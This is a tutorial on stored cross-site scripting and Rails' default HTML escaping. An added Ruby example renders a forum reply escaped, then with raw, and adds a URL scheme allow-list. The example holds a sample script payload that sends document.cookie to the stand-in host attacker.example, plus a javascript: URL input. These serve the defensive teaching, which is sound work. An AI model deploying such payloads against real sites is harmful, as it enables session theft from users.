XSS - Cross-site Scripting
Imagine a forum. In the form for posting a reply to a thread, there's a text field for the reply body. What happens if you put HTML in there? Will it get filtered? You'd hope so, but with many web application frameworks it doesn't get filtered automatically: whatever the user typed is written into the page verbatim. But why is this dangerous? Why does it matter if someone can insert a blink tag?
Alice and Bob are legitimate users of a site. They check the forums every day. Eve is an evil attacker; she'd like to compromise the accounts of Alice and Bob and read their private correspondence (she's afraid they're talking about her behind her back). Eve is going to use a technique called a "stored cross-site scripting" attack to do this: she posts a reply whose body contains a <script> tag. The site stores the reply and serves it, unfiltered, to everyone who reads the thread, so when Alice and Bob open it the script runs in their browsers, logged in as them, and can read their session cookies or act on their behalf.
That's a bit of a simplistic explanation, but it really does happen. Usually you'll find XSS vulnerabilities in smaller fields, in profiles, shout walls, etc. But you need to be aware of it and of how Ruby on Rails takes care of it for you.
Whenever you use the <%= code %> tags, the output is already being HTML-escaped: the characters with meaning in HTML (<, >, &, " and ') are replaced by entities such as &lt;, so the browser displays them as text instead of interpreting them as markup. If you were to, for example, say <%= "<blink>testing</blink>" %> in a template, the string literal is passed through this escaping automatically; you don't have to do anything to get the protection. In Rails 2 you had to say <%=h code %> to get this behavior (h is the html_escape helper). However, it was noticed that in 99 out of 100 cases you want the escaping, and if someone forgets to type the h, you have a possible XSS vulnerability. Since Rails 3, you have to explicitly tell Rails you don't want the escaping using <%=raw code %>. Under the hood, raw marks the string as "html safe" (the same mark String#html_safe applies), and the template engine skips escaping for strings carrying that mark, so only use it on content you trust or have already run through the sanitize helper.
As an experiment, you can try outputting various strings using ERB in a Rails view. Note that these can come from anywhere, string literals or instance variables, it doesn't matter. Every string output through <%= %> in a Rails view is escaped (the escaping is done by Action View's output buffer; plain Ruby ERB outside Rails does not do it).
<%= "<blink>Testing</blink>" %>
<%# This one won't be filtered, and the text will blink %>
<%=raw "<blink>Testing</blink>" %>
Also, note that the raw and h methods are not special ERB tags. They look like it, especially since there's no space after the =, but they're just methods and we're omitting the method call parentheses. If you're passing anything more than a simple expression to these methods, it's best to add the parentheses back so it's unambiguous what is being marked as safe.
The important things to note here are that output escaping is on by default for everything you emit with <%= %>, that you need the raw method (or html_safe) if you want unescaped output, and that, for ordinary text placed between HTML tags or inside quoted attribute values, you don't need to worry about XSS. Escaping does not cover every context, though: a value placed into an href or src attribute can still be a javascript: URL, a value written into an inline <script> block is a JavaScript context where HTML entities are not decoded and needs the j (escape_javascript) helper, and any string that arrives already marked html_safe (from raw, html_safe or a helper that builds markup) bypasses the protection entirely. Those are the places to look when reviewing a Rails view for XSS.
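To make the behaviour described above concrete, here is an added example (not code from the original page or from Rails itself) that uses only Ruby's standard library. It emulates what Rails' <%= %> does, with a small SafeString class standing in for Rails' html_safe marking, renders a constructed forum reply from Eve both escaped and via raw, and goes one step beyond the text: it shows that escaping alone does not neutralise a javascript: URL in an href, and adds the scheme allow-list that does. The reply payload, the attacker.example host and the helper names rails_output, render_reply, safe_url and render_profile_link are all assumptions made for this example.

```ruby
require 'erb'
require 'uri'

# Emulation of Rails' html_safe marking (not Rails code): a string that has
# been declared safe is passed through to the page without escaping.
class SafeString < String
  def html_safe?
    true
  end
end

# Emulates Rails' raw helper: declare the string trusted, so it is not escaped.
def raw(value)
  SafeString.new(value.to_s)
end

# What Rails 3+ effectively does for every <%= %>: escape unless the value is
# marked safe. ERB::Util.html_escape is the same routine Rails uses; it turns
# & < > " ' into &amp; &lt; &gt; &quot; &#39;.
def rails_output(value)
  return String.new(value) if value.respond_to?(:html_safe?) && value.html_safe?
  ERB::Util.html_escape(value.to_s)
end

# Render a forum reply the way a Rails view would. Author and body are untrusted.
def render_reply(author, body)
  template = ERB.new(<<~'HTML')
    <div class="reply">
      <span class="author"><%= rails_output(author) %></span>
      <div class="body"><%= rails_output(body) %></div>
    </div>
  HTML
  template.result(binding)
end

# Constructed attacker payload (sample data for this example): a reply body
# that tries to ship the reader's cookies to a host Eve controls.
EVE_REPLY = '<script>new Image().src = "https://attacker.example/?c=" + document.cookie;</script>'

# Escaping is context-specific. html_escape makes text safe between tags and
# inside quoted attribute values, but a javascript: URL in an href contains
# nothing that needs escaping and survives untouched. Allow-list the scheme;
# anything else (including relative URLs, for simplicity here) becomes "#".
def safe_url(url)
  uri = URI.parse(url.to_s)
  return '#' unless %w[http https].include?(uri.scheme.to_s.downcase)
  url.to_s
rescue URI::InvalidURIError
  '#'
end

# A profile link: the URL is checked first, then escaped as attribute text.
def render_profile_link(url)
  template = ERB.new('<a href="<%= rails_output(safe_url(url)) %>">homepage</a>')
  template.result(binding)
end

if $PROGRAM_NAME == __FILE__
  puts render_reply('Eve', EVE_REPLY)        # escaped: the script arrives as inert text
  puts render_reply('Eve', raw(EVE_REPLY))   # raw: the script reaches the browser
  puts render_profile_link('javascript:alert(document.cookie)')
  puts render_profile_link('https://example.com/?a=1&b=2')
end
```

Run the file directly to see all four renderings. The first one turns Eve's payload into literal text; the second, with raw, is exactly the stored XSS the forum story describes, which is why raw belongs only on content you already trust. The last two show that the href case is a validation problem rather than an escaping problem: rails_output leaves "javascript:alert(document.cookie)" byte-for-byte intact, and only the scheme check stops it. In a real Rails app the safe mark is an ActiveSupport::SafeBuffer rather than this SafeString stand-in, but the decision rule is the same.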
For information about CSRF vulnerabilities, a related and equally serious class of vulnerability that is often combined with XSS, see the article on Cross-site Request Forgeries.